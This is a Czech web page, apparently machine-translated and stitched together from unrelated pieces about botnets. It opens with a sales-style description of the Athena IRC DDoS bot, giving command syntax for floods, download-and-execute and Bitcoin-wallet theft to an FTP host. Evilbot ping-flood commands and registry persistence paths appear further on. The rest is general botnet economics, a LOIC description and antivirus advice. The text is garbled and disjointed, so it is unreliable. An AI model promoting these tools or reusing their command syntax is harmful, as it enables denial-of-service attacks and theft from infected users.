Botnet. Jak vznikají botnety. Prostředky ochrany proti botnetům. Bojujte s roboty DDoS na IRC Je můj počítač napaden robotem?

Athena IRC je stabilní DDoS bot kódovaný v C++ (nulové závislosti) ideální pro infikování a stáhnutí počítačů s Windows. Tento bot obsahuje jedny z nejlepších a nejpokročilejších taktik DDoS dostupných na trhu, které odstraní webové servery, herní servery, servery TeamSpeak/VoIP, domácí připojení atd. s lehkostí. Je odolný vůči botkilingu a zabije většinu ostatních dostupných botů.
Robot je vybaven:
- Botkiller je schopen zničit roboty jako Andromeda, Zeus, SpyEye, Insomniac, SmokeLoader, ngrBot atd.
- 11 metod DDoS, stejné taktiky používané v AthenaIRC (některé z nejvýkonnějších DDoS taktik dostupných na trhu)
- Vestavěný ověřovací web, který používá roboty, ne jako hyperspin.com nebo just-ping.com
- SmartView / normální zobrazení / skryté zobrazení (z náhodného existujícího prohlížeče)
- Podrobné statistiky o každém robotovi
- Stáhnout/Aktualizovat/Smazat
- Shell Commands (protože nikdy nevíte)
Upozornění: Bunkr není FUD.

Příkazy/Funkce: (V motivu můžete nastavit kterékoli z nich – roboti příkaz k připojení analyzují)
Příkazy DDoS
[Port 80 je nejběžnější pro webové stránky]
! UDP – posílá obrovské množství náhodných paketů do cílového hostitele/IP, ideální pro domácí připojení (SYNTAX: UDP host/IP port time!) [Použijte "0" k zahlcení náhodných portů]
! Condis - Rychlé připojení/odpojení před záplavami, odstraňuje hry (např. CSS) a TeamSpeak/VoIP servery jako omáčka (SYNTAX: condis host/IP time port)
! HttpGet – každou sekundu rychle odešle stovky požadavků HTTP GET od každého robota
! HttpPost – Odesílá stovky požadavků HTTP POST od každého robota a udržuje připojení při pomalém odesílání obsahu
Registrovat hosting ←
Teams Flood IRC War
! IRC - Připojte se k IRC a zaplavte cíl (#kanál nebo uživatele) pomocí mnoha různých komunikačních metod v IRC. (Syntaxe: IRC irc.server.net 6667 180 nick / # kanál)
! Anope - Layer 7 IRC DDoS. Nezáleží na tom, zda skrytý IRC síťový rozbočovač chrání služby, stále mohou být ddos"ed na aplikační úrovni. Tento útok způsobí pád služeb Anope. (Syntaxe: Anope irc.server.net 6667 180)
Různé příkazy botů
! ID – Zobrazuje verzi robota a kdo má licenci
! Ping – Vrátí čas pingu robota na jeho aktuální připojení
! OpenURL – otevře webovou stránku ve výchozím prohlížeči (syntaxe: OpenURL http://website.com!)
! Openurlhidden – otevře webovou stránku skrytou v Internet Exploreru (SYNTAX: openurlhidden http://website.com!)
! Blockurl – Vytvoří řádek v souboru hostitelů počítače, který odepře přístup k určenému hostiteli (SYNTAX: blockurl website.com)
! dlexec - Načte a spustí soubor z adresy URL (SYNTAX: dlexec http://website.com/program.exe!)
! - Aktualizace Stáhněte a spusťte daný odkaz. Robot bude po úspěšném spuštění smazán (syntaxe: updatehttp://website.com/file.exe)
! Smazat – Smaže robota a odstraní veškeré jeho stopy
Zloději
! Btcwallet – prohledá počítač robota, zda neobsahuje peněženku wallet.dat (BTC) a nahraje ji na vámi zvolený FTP (! SYNTAX: btcwallet ftphost.com user123 pass123)
IRC příkazy
! Raw – Odešle nezpracované příkazy na server (SYNTAX: raw PRIVMSG #kanál: zpráva!)
! Zapnutí/vypnutí ticha – přepíná výstup robota (! přepsáno příkazem raw)
! Připojte se – robot se připojí ke kanálu (SYNTAX: připojte se k #kanálu!)
! - Podrobnosti o robotovi z kanálu (! SYNTAXE: #část kanálu)
! Newnick – Změní přezdívku robota pomocí nového náhodného čísla a jména
! Randnick zapnuto/vypnuto – přepínání pro náhodná jména botů (Samantha58385) a informace založené na názvu bota (ABCDE)
! Znovu připojit – pokusí se znovu připojit k aktuálnímu serveru/síti a kanálu IRC po odpojení po dobu 20 sekund

Dnes se botnety staly jedním z hlavních nástrojů kyberzločinců. ComputerBild vám řekne, co jsou to botnety, jak fungují a jak zachránit váš počítač před pádem do zombie sítě.

Botnet neboli zombie síť je síť počítačů infikovaných malwarem, která útočníkům umožňuje vzdáleně ovládat stroje jiných lidí bez vědomí jejich vlastníků. V posledních letech se zombie sítě staly stabilním zdrojem příjmů kyberzločinců. Trvale nízké náklady a minimum znalostí potřebných pro správu botnetů přispívají k růstu popularity, a tedy i počtu botnetů. Útočníci a jejich zákazníci vydělávají tisíce dolarů na DDoS útocích nebo spamových e-mailech prováděných pomocí zombie sítí.

Je můj počítač napaden robotem?

Na tuto otázku není snadné odpovědět. Faktem je, že je téměř nemožné sledovat rušení robotů v každodenním provozu počítače, protože to žádným způsobem neovlivňuje výkon systému. Existuje však několik znaků, podle kterých můžete určit, že v systému existuje robot:

Neznámé programy se pokoušejí připojit k internetu, což je pravidelně rozhořčeně hlášeno bránou firewall nebo antivirovým softwarem;

Internetový provoz je velmi vysoký, ačkoli internet používáte velmi střídmě;

V seznamu běžících systémových procesů se objevují nové, které se maskují jako běžné procesy Windows (např. bot se může jmenovat scvhost.exe - toto jméno je velmi podobné názvu systémového procesu Windows svchost.exe; je to docela obtížné zaznamenat rozdíl, ale je to možné).

Proč vznikají botnety?

Botnety jsou vytvářeny za účelem vydělávání peněz. Existuje několik oblastí komerčně ziskového využití zombie sítí: DDoS útoky, shromažďování důvěrných informací, rozesílání spamu, phishing, vyhledávací spam, podvádění počítadel kliknutí atd. Je třeba poznamenat, že jakýkoli směr, který si útočník zvolí, bude ziskový a Botnet vám umožňuje provádět všechny výše uvedené činnosti současně.

DDoS útok (z anglického Distributed Denial-of-Service) je útok na počítačový systém, například webovou stránku, jehož účelem je přivést systém do „krachu“, tedy do stavu, kdy může již nebudou přijímat a zpracovávat požadavky legitimních uživatelů. Jednou z nejběžnějších metod provádění DDoS útoku je odesílání četných požadavků na počítač nebo web oběti, což vede k odmítnutí služby, pokud zdroje napadeného počítače nestačí ke zpracování všech příchozích požadavků. DDoS útoky jsou pro hackery impozantní zbraní a botnet je ideálním nástrojem k jejich provedení.

DDoS útoky mohou být jak prostředkem nekalé soutěže, tak akty kybernetického terorismu. Majitel botnetu může poskytnout službu každému nepříliš svědomitému podnikateli – provést DDoS útok na web jeho konkurenta. Po takovém zatížení napadený zdroj „spadne“, útočník získá dočasnou výhodu a kyberzločinec dostane skromnou (nebo nepříliš velkou) odměnu.

Stejně tak mohou sami majitelé botnetů pomocí DDoS útoků vymáhat peníze z velkých společností. Firmy přitom preferují vyhovět požadavkům kyberzločinců, protože eliminace následků úspěšných DDoS útoků je velmi nákladná. Například v lednu 2009 utrpěl jeden z největších hostitelů, GoDaddy.com, DDoS útok, v jehož důsledku byly tisíce webů hostovaných na jeho serverech téměř jeden den nedostupné. Finanční ztráty hostitele byly obrovské.

V únoru 2007 byla provedena série útoků na kořenové DNS servery, na jejichž provozu přímo závisí normální fungování celého internetu. Je nepravděpodobné, že účelem těchto útoků bylo zhroucení World Wide Web, protože existence sítí zombie je možná pouze v případě, že internet existuje a funguje normálně. Především to bylo jako ukázka síly a schopností zombie sítí.

Reklamy na útočné služby DDoS jsou otevřeně zveřejňovány na mnoha relevantních fórech. Ceny za útoky se pohybují od 50 do několika tisíc dolarů za den nepřetržitého provozu DDoS botnetu. Podle webu www.shadowserver.org bylo v roce 2008 provedeno asi 190 tisíc DDoS útoků, na kterých mohli kyberzločinci vydělat asi 20 milionů dolarů. Tato částka samozřejmě nezahrnuje příjmy z vydírání, které prostě nelze spočítat.

Shromažďování důvěrných informací

Důvěrné informace uložené v počítačích uživatelů budou vždy přitahovat útočníky. Největší zájem jsou o čísla kreditních karet, finanční informace a hesla k různým službám: poštovní schránky, FTP servery, instant messengery atd. Moderní malware zároveň umožňuje útočníkům vybrat přesně ta data, která jsou pro ně zajímavá – k tomu, stačí nahrát do PC odpovídající modul.

Útočníci mohou ukradené informace buď prodat, nebo je využít ve svůj prospěch. Na četných fórech na internetu se denně objevují stovky inzerátů na prodej bankovních účtů. Cena účtu závisí na množství peněz na účtu uživatele a pohybuje se od 1 do 1 500 USD na účet. Spodní hranice naznačuje, že v průběhu konkurence jsou kyberzločinci zabývající se tímto typem podnikání nuceni snižovat ceny. Aby opravdu hodně vydělali, potřebují stabilní příliv čerstvých dat, a k tomu je nutný stabilní růst zombie sítí. Finanční informace jsou zajímavé zejména pro kartáře – zločince podílející se na padělání bankovních karet.

Jak výnosné jsou takové operace, lze posoudit podle známého příběhu skupiny brazilských kyberzločinců, kteří byli zatčeni před dvěma lety. Podařilo se jim vybrat 4,74 milionu dolarů z bankovních účtů běžných uživatelů pomocí informací ukradených z počítačů. Zločinci, kteří se podílejí na padělání dokumentů, otevírání falešných bankovních účtů, provádění nelegálních transakcí atd., mají také zájem získat osobní údaje, které přímo nesouvisí s penězi uživatele.

Dalším typem informací, které botnety shromažďují, jsou e-mailové adresy a na rozdíl od čísel kreditních karet a účtů lze z adresáře jednoho infikovaného počítače získat mnoho e-mailových adres. Shromážděné adresy jsou nabízeny k prodeji, někdy „podle hmotnosti“ - podle hodnoty megabajtů. Hlavními kupci takových „produktů“ jsou spammeři. Seznam milionu e-mailových adres stojí od 20 do 100 dolarů a zásilky objednané spammerům na stejný milion adres stojí 150-200 dolarů. Přínos je zřejmý.

Zločinci se zajímají i o účty různých placených služeb a internetových obchodů. Jsou samozřejmě levnější než bankovní účty, ale jejich realizace je spojena s nižším rizikem trestního stíhání ze strany orgánů činných v trestním řízení.

Každý den kolují po celém světě miliony spamových zpráv. Odesílání nevyžádané pošty je jednou z hlavních funkcí moderních botnetů. Podle společnosti Kaspersky Lab je asi 80 % veškerého spamu odesíláno prostřednictvím sítí zombie. Miliardy dopisů inzerujících Viagru, kopie drahých hodinek, online kasina atd. jsou odesílány z počítačů dodržujících uživatelů, ucpávají komunikační kanály a poštovní schránky. Hackeři tak vystavují počítače nevinných uživatelů riziku: adresy, ze kterých jsou maily zasílány, končí na blacklistech antivirových společností.

V posledních letech se rozšířil rozsah samotných spamových služeb: objevil se spam ICQ, spam na sociálních sítích, fórech a blozích. A to je také „zásluha“ majitelů botnetů: koneckonců není vůbec těžké přidat do botového klienta další modul, který otevírá obzory pro nové obchody se slogany jako „Spam na Facebooku. Levný." Ceny za spam se liší v závislosti na cílové skupině a počtu adres, na které je e-mail odeslán. Ceny za cílené rozesílání se pohybují od 70 USD za stovky tisíc adres do 1 000 USD za několik desítek milionů adres. Za poslední rok spameři vydělali za odesílání e-mailů asi 780 milionů dolarů.

Vytváření vyhledávacího spamu

Dalším případem použití botnetů je zvýšení popularity webových stránek ve vyhledávačích. Při práci na optimalizaci pro vyhledávače se správci zdrojů snaží zvýšit pozici webu ve výsledcích vyhledávání, protože čím je vyšší, tím více návštěvníků bude na web přicházet prostřednictvím vyhledávačů, a tím větší příjmy vlastníka webu, např. z prodeje reklamního prostoru na webových stránkách. Mnoho společností platí webmasterům velké peníze za to, aby se jejich web dostal na přední pozice ve vyhledávačích. Majitelé botnetů využili některé z jejich triků a zautomatizovali proces optimalizace pro vyhledávače.

Když v komentářích k vašemu příspěvku v LiveJournalu nebo k úspěšné fotce zveřejněné na webu pro hostování fotografií uvidíte spoustu odkazů vytvořených vám neznámou osobou a někdy i vaším „přítelem“, nedivte se: někdo prostě nařídil propagaci svého zdroje na botnet vlastníků. Speciálně vytvořený program je stažen do zombie počítače a jménem svého vlastníka zanechává komentáře k oblíbeným zdrojům s odkazy na propagované stránky. Průměrná cena za nelegální vyhledávací spamové služby je asi 300 USD měsíčně.

Kolik stojí osobní údaje?

Cena odcizených osobních údajů přímo závisí na zemi, ve které žije jejich právoplatný vlastník. Například kompletní data amerického rezidenta stojí 5-8 dolarů. Na černém trhu jsou cenná především data obyvatel Evropské unie – ta jsou dvakrát až třikrát dražší než data občanů Spojených států a Kanady. To lze vysvětlit tím, že tyto údaje mohou používat zločinci v kterékoli zemi EU. Průměrná cena na celém světě za kompletní balík dat o jedné osobě je asi 7 dolarů.

Bohužel pro ty, kteří se rozhodnou zorganizovat botnet od nuly, nebude těžké najít na internetu návod na vytvoření zombie sítě. První krok: vytvořte novou zombie síť. Chcete-li to provést, musíte infikovat počítače uživatelů speciálním programem - robotem. Pro infekci se používají spamové e-maily, zveřejňování zpráv na fórech a sociálních sítích a další techniky; Bot je často vybaven funkcí vlastního šíření, jako jsou viry nebo červi.

Techniky sociálního inženýrství se používají k přinucení potenciální oběti k instalaci robota. Nabízejí například sledování zajímavého videa, které vyžaduje stažení speciálního kodeku. Po stažení a spuštění takového souboru uživatel samozřejmě nebude moci sledovat žádné video a s největší pravděpodobností si vůbec nevšimne žádných změn a jeho PC bude infikováno a stane se poslušným sluhou, který provádí všechny příkazy vlastníka botnetu.

Druhým široce používaným způsobem napadení botem je stahování pomocí pohonu. Když uživatel navštíví infikovanou webovou stránku, škodlivý kód se do jeho počítače stáhne různými „dírami“ v aplikacích – především v oblíbených prohlížečích. K využití slabých míst se používají speciální programy - exploity. Umožňují vám nejen tiché stahování, ale také tiché spuštění viru nebo bota. Tento typ distribuce malwaru je nejnebezpečnější, protože pokud je populární zdroj hacknut, nakazí se desítky tisíc uživatelů!

Bot může být vybaven funkcí samopropagace po počítačových sítích. Může se například šířit infikováním všech dostupných spustitelných souborů nebo vyhledáváním a infikováním zranitelných počítačů v síti.

Tvůrce botnetu může ovládat infikované počítače nic netušících uživatelů pomocí příkazového centra botnetu, komunikovat s roboty prostřednictvím kanálu IRC, webového připojení nebo jinými dostupnými prostředky. Stačí připojit několik desítek strojů do sítě, aby botnet začal generovat příjem pro svého majitele. Tento příjem je navíc lineárně závislý na stabilitě sítě zombie a rychlosti jejího růstu.

Online reklamní společnosti fungující v rámci PPC (Pay-per-Click) schématu platí peníze za unikátní kliknutí na odkazy na inzeráty umístěné na internetu. Pro vlastníky botnetů je podvádění takových společností ziskový byznys. Můžete si vzít například známou síť Google AdSense. Inzerenti, kteří jsou v něm zahrnuti, platí společnosti Google za kliknutí na zveřejněné reklamy v naději, že uživatel, který se u nich zastaví, si od nich něco koupí.

Google zase umísťuje kontextovou reklamu na různé stránky účastnící se programu AdSense a platí majiteli stránek určité procento z každého kliknutí. Bohužel, ne všichni majitelé webových stránek jsou čestní. Pomocí zombie sítě může hacker generovat tisíce unikátních kliknutí denně – jedno z každého počítače, aniž by vzbudil u společnosti Google velké podezření. Peníze vynaložené na reklamní kampaň tak potečou do kapsy hackera. Bohužel se zatím nevyskytl jediný případ, kdy by se za takové jednání někdo zodpovídal. Podle Click Forensics bylo v roce 2008 asi 16–17 % všech kliknutí na reklamní odkazy falešných, z nichž nejméně třetinu generovaly botnety. Po provedení jednoduchých výpočtů můžete pochopit, že v loňském roce majitelé botnetů „shrábli“ 33 000 000 $. Dobrý příjem z kliknutí myší!

Útočníci a nepoctiví podnikatelé nemusí nutně sami vytvářet botnet od nuly. Od hackerů si mohou koupit nebo pronajmout botnety různých velikostí a výkonu – například tím, že se obrátí na specializovaná fóra.

Náklady na hotový botnet, stejně jako náklady na jeho pronájem, přímo závisí na počtu počítačů, které jsou v něm obsaženy. Hotové botnety jsou nejoblíbenější na fórech v anglickém jazyce.

Malé botnety, sestávající z několika stovek robotů, stojí mezi 200 a 700 dolary. Průměrná cena jednoho bota je přitom přibližně 50 centů. Větší botnety stojí více peněz.

Zombie síť Shadow, kterou před několika lety vytvořil 19letý hacker z Holandska, sestávala z více než 100 tisíc počítačů umístěných po celém světě a prodala se za 25 000 eur. Za tyto peníze si můžete koupit malý dům ve Španělsku, ale zločinec z Brazílie se rozhodl koupit botnet.

Nástroje ochrany proti botnetu

1. V prvé řadě se jedná o antivirové programy a komplexní balíčky na ochranu před internetovými hrozbami s pravidelně aktualizovanými databázemi. Pomohou nejen včas odhalit nebezpečí, ale také jej odstranit dříve, než váš věrný „železný přítel“, proměněný v zombie, začne posílat spam nebo „zahazovat“ stránky. Komplexní balíčky, jako je Kaspersky Internet Security 2009, obsahují úplnou sadu funkcí zabezpečení, které lze spravovat prostřednictvím společného příkazového centra.

Antivirový modul skenuje kritické systémové oblasti na pozadí a monitoruje všechny možné cesty virové invaze: přílohy e-mailů a potenciálně nebezpečné webové stránky.

Firewall monitoruje výměnu dat mezi osobním počítačem a internetem. Kontroluje všechny datové pakety přijaté z internetu nebo odeslané na internet a v případě potřeby blokuje síťové útoky a zabraňuje tajnému odesílání soukromých dat na internet.

Spamový filtr chrání vaši schránku před pronikáním reklamních sdělení. Mezi jeho úkoly patří také identifikace phishingových e-mailů, pomocí kterých se útočníci snaží z uživatele vydolovat informace o jeho přihlašovacích údajích do online platebních nebo bankovních systémů.

2. Pravidelné aktualizace operačního systému, webových prohlížečů a dalších aplikací, jejichž vývojáři odhalují a odstraňují mnohé mezery v jejich ochraně a také slabiny zneužívané útočníky.

3. Speciální šifrovací programy ochrání vaše osobní data, i když už bot pronikl do počítače, protože pro přístup k němu bude muset prolomit heslo.

4. Zdravý rozum a opatrnost. Pokud chcete chránit svá data před různými typy hrozeb, neměli byste stahovat a instalovat programy neznámého původu, neotevírat archivy se soubory i přes varování antiviru, navštěvovat stránky, které váš prohlížeč označuje jako nebezpečné atd.

Děkujeme společnosti Kaspersky Lab za pomoc při přípravě materiálu

LOIC je program, který umožňuje aktivaci DDoS útoku na web nebo server. Tento nástroj byl původně vytvořen pro kontrolu ochrany, která je na něm. Program je navržen pro spouštění DDOS útoků a funguje jako speciální nástroj, takže jej používejte pouze pro experimentování.

Program má přístup ke zdrojovému kódu. V případě potřeby si stáhněte další materiály ze služby SourceForge. Zdroj označí program jako malware. Při stahování Low Orbit Ion Cannon mějte na paměti, že jej používáte na vlastní nebezpečí.

Princip fungování

Program se vloží do serveru a provede vícevrstvý útok a otevře více připojení k serveru. Poté "LOIC" naruší server a dosáhne chybového kódu, který znamená "vítězství". K přerušení serveru dochází v sekvenčním režimu. V okně programu vidíte podrobné statistiky o dostupných chybách na serveru a jeho výkonu.

Při „hacknutí serveru“ pomocí DDoS útoků uvidíte data o aktivních připojeních. Tyto parametry se během útoku neustále mění. Navíc se zobrazují zprávy o kódu, který se vrací ze serveru a pokouší se k němu připojit ve standardním režimu.

Nástroj pracuje ve standardním režimu, využívá konvenční nástroje a hackerské metody. LOIC „hází“ spam do požadavků HTTP a způsobuje selhání zařízení. LOIC je distribuován ve standardní verzi i útočné verzi prostřednictvím zpravodajských kanálů a komunikačních programů. Druhá verze programu je vhodná pro tvůrce botnetů.

Rozhraní

Všechny funkce nalezené v programu LOIC jsou umístěny na jednom panelu. Zadáním adresy serveru nebo adresy IP pro útok se zobrazí seznam dostupných připojení. Grafické rozhraní je jednoduché a intuitivní, ale v shellu není žádná ruská lokalizace. Často takové nástroje nejsou přeloženy do ruštiny.

Klíčové vlastnosti

  • nástroj „hackne“ server, provede útok a způsobí selhání zařízení na něm;
  • program má jednoduché rozhraní, které je vytvořeno v režimu jednoho okna;
  • LOIC rozesílá spam ve formě požadavků přes HTTP a další pakety;
  • rozhraní má otevřený zdrojový kód, který byl vytvořen v programovacím jazyce C#;
  • „cracker“ funguje na starších generacích sestavení operačního systému Windows;
  • Program běží na bezplatné licenci.

IRC boti se stávají nástrojem pro DDOS útoky. Unikátní auta už nejsou
jsou vyžadovány k provádění DOSových útoků (pravděpodobně máte programy jako TFN, Trin00, které fungují na *nixech), vše se již mnohem zjednodušilo.

Nyní si můžete nainstalovat svého vlastního bota na jakýkoli počítač se systémem Windows, který lze snadno konfigurovat a spravovat. Útoky jsou řízeny z kanálu, ke kterému se roboti připojují. Po příchodu na kanál robot jednoduše „sedí a čeká“ na příkazy vlastníka. Obvykle takto
kanály jsou buď tajné, nebo chráněné heslem, takže pouze jejich vlastník může vstoupit do kanálu a ovládat akce robota.

Ale tato metoda DDOS útoků má jednu obrovskou nevýhodu: oběť může zjistit server, kanál a heslo k němu. To může vést k tomu, že jednoduše „ukradne“ vaši armádu robotů. Tomu se však lze vyhnout tím, že přikážete robotům, aby se připojili k různým serverům, takže sledování všech robotů na všech serverech bude velmi obtížné (představte si, řekněme, že se tucet robotů připojí k prvnímu kanálu, tucet ke druhému atd. on - v takové situaci je docela obtížné vypočítat VŠECHNY roboty) .

Jak boti útočí na oběti?

Rozdíl mezi útoky DOS a DDOS je obrovský: zatímco útok DOS se provádí pomocí známé díry v systému, útok DDOS zaplavuje počítač z různých hostitelů nesmyslnými pakety, což zpomaluje schopnost systému přijímat a zpracovávat data, a z tohoto
nesmírně těžké bránit. DDOS IRC boti běžící na Win9x odesílají UDP a ICMP
pakety (tj. ping), pokud to umožňuje maximální odchozí šířka pásma hostitele.

Existují roboti, kteří dokážou generovat mnohem nebezpečnější pakety, které porušují synchronizaci připojení TCP (TCP Syn/Ack), ale takové útoky nelze provést z hostitelů s Win9x. Obvykle jsou tito boti nainstalováni na Win2K/XP -
jen tam jsou všechny potřebné prostředky. Mohou způsobit, že útok na webový server je velmi ošemetný a obtížně blokovatelný: UDP a ICMP může poskytovatel nějak filtrovat a nemůže ovlivnit kvalitu služeb, ale pakety TCP nelze zakázat, aniž by to ovlivnilo provoz. Když je TCP zakázáno, obvykle to znamená, že server nemůže správně poskytovat webové a ftp služby.

Existují již hotoví boti napsaní speciálně pro použití v prostředí Win2k a WinXP (například Evilbot nebo Slackbot 1.0). Právě s pomocí Evilbota byl zaplaven grc.com Samotný bot je malý soubor (o velikosti 10-16 kb), který oběť spustí na svém počítači, poté se bot zaregistruje do adresáře Windows (pro. příklad: \Windows\WinRun2 exe) Při každém spuštění se robot zaregistruje v části registru:
HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion\Run\ a vypadá asi takto:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinRun. Evilbot své soubory nikdy nepřepíše, ale pouze se znovu zaregistruje do registru, kde uvede cestu ke svému adresáři.

Poté se bot pokusí připojit ke konkrétnímu IRC serveru, jde tam a tiše sedí na kanálu a čeká na příkazy. Zároveň on
se připojí k jinému serveru, odkud stáhne trojského koně, spustí jej přibližně takto: „update.ur.address./thepath.exe“. Pokud byl bot první, kdo vstoupil do neregistrovaného kanálu, okamžitě ve výchozím nastavení nainstaluje mod + nstk. Evilbot poslouchá jakoukoli osobu přítomnou na kanálu (a Slackbot 1.0 žádá o heslo). Může být přikázáno, aby odeslal příkaz ping na konkrétního hostitele: "!udp 101.105.201.212 1000 0", kde 1000 je počet paketů a 0 na konci je časové zpoždění mezi pakety.
Evilbotův ping je následující:

P4
Odešle 10 000 64 kbyte ping paketů na konkrétní IP
!p3< ip жертвы >
Odešle 1000 64kbyte ping paketů na konkrétní IP
!p2< ip жертвы >
Odešle 100 64 kbyte paketů ping na konkrétní IP
!p1< ip жертвы >
Odešle 10 64 kbyte paketů ping na konkrétní IP

Počet pingů a jejich velikost lze měnit – například příkaz!p4 odešle 15 000 32bajtových ICMP paketů na zadanou ip.

Jak mohu zjistit, zda mám v systému robota?

Některé antiviry nevidí roboty v systému, ale můžete je detekovat ručně tím, že zkontrolujete počítač na přítomnost neoprávněného připojení IRC. Můžete jednoduše zkontrolovat všechna síťová připojení: netstat -an | najít ":6667"

Pokud vám potvrdí aktivní připojení, může se stát, že váš počítač je infikován. Nebylo by na škodu zkontrolovat další porty, které IRC často používá.
Zde se můžete podívat do registru a zkontrolovat nové podezřelé změny:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. Pokud najdete klíč indikující přítomnost robota, smažte jej, restartujte počítač a smažte ošklivého robota.

Botnet nebo síť botů je počítačová síť sestávající z velkého počtu počítačů, na kterých je tajně nainstalován škodlivý software, umožňující útočníkům na dálku provádět jakékoli akce pomocí výpočetních zdrojů infikovaných strojů. Stovky nebo dokonce tisíce infikovaných počítačů jsou obvykle využívány k nelegálním a škodlivým činnostem – rozesílání spamu, virů, krádeže osobních údajů nebo provádění DDoS útoků. Botnety jsou dnes považovány za jednu z nejzávažnějších kybernetických hrozeb.

Jak se botnety objevují?

Aby se váš počítač stal součástí botnetu, musí být infikován specializovaným malwarem, který udržuje kontakt se vzdáleným serverem nebo jiným infikovaným zařízením a dostává tak pokyny k akci od útočníků, kteří botnet ovládají. Kromě působivého rozsahu infekce se malware používaný k vytváření botnetů v podstatě příliš neliší od tradičního malwaru.

Jak poznat botnet?

Typický malware botnetu lze detekovat stejným způsobem jako všechny ostatní malware. Nepřímé příznaky mohou zahrnovat pomalý provoz, podivné chování, chybové zprávy nebo náhlé spuštění chladicího ventilátoru, když je počítač v pohotovostním režimu. Toto jsou možné příznaky toho, že někdo vzdáleně používá váš počítač jako součást rozsáhlého botnetu.

Jak odebrat počítač z botnetu?

Než budete moci odebrat počítač z botnetu, musíte odstranit malware, který útočníci používají k jeho vzdálenému ovládání. Nejúčinnějším způsobem je skenování počítačového systému pomocí antiviru, který pomůže detekovat malware a odstranit jej z počítače.

Jak se vyhnout infekci malwarem specifickým pro botnet:
  • Nainstalujte si do počítače kvalitní antivirové řešení
  • Nastavte automatické aktualizace pro všechny programy třetích stran
  • Buďte velmi opatrní při sledování odkazů, stahování programů nebo otevírání souborů
Další způsoby, jak se chránit před rizikem, že se stanete součástí botnetu:

Abyste ochránili svůj počítač před rizikem, že se stanete jedním ze „zombie“ v armádě botnetů, snažte se vyhnout podezřelému stahování. Neklikejte na odkazy ani neotevírejte přílohy z e-mailů, jejichž odesílatelé jsou vám neznámí, a buďte extrémně opatrní při instalaci softwaru třetích stran do vašeho počítače. Udržujte software třetích stran aktuální a instalujte všechny nejnovější aktualizace operačního systému. Nejdůležitější je však použití moderní a kvalitní antivirové ochrany, například antivirus Avast, který zajistí spolehlivou ochranu vašeho počítače proti všem typům malwaru a pomůže zabránit infikování vašeho počítače a jeho zařazení do botnet.




Nahoru